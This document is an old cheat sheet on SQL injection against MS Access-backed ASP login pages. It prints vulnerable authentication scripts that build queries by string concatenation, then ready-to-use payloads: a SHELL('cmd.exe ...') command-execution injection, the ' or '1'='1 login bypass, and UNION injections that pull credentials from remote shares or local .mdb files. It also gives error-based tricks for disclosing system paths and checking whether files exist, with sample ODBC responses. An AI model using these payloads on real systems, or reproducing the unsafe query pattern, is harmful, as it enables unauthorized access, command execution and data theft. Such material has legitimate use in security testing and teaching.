Access SQL injection

================================================== ==========================
% Access SQL Injection
% brett.moore_at_security-assessment.com
================================================== ==========================
Nothing new here, move along..
************************************************** **************************
% MS Access system tables
************************************************** **************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
************************************************** **************************
% MS Access command execution, (older versions only)
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = SHELL("cmd.exe /c dir > c:\test.txt")
pass = test
************************************************** **************************
% Auth Bypass, Basic
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
************************************************** **************************
% Auth Bypass, Simple
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.m db'
pass = 0test
[Union Notes]
Remeber when using unions the sort order can affect the first record
returned.
************************************************** **************************
% System Path Disclosure
************************************************** **************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
open the file 'C:\WINNT\system32'. It is already opened exclusively by
another user,
or you need permission to view its data.
************************************************** **************************
% Verify File Exists
************************************************** **************************
[Sql String - non-existant file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existant]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
************************************************** **************************
% Verify Path Exists
************************************************** **************************
[Sql String - non-existant path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[Sql String - existant path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'.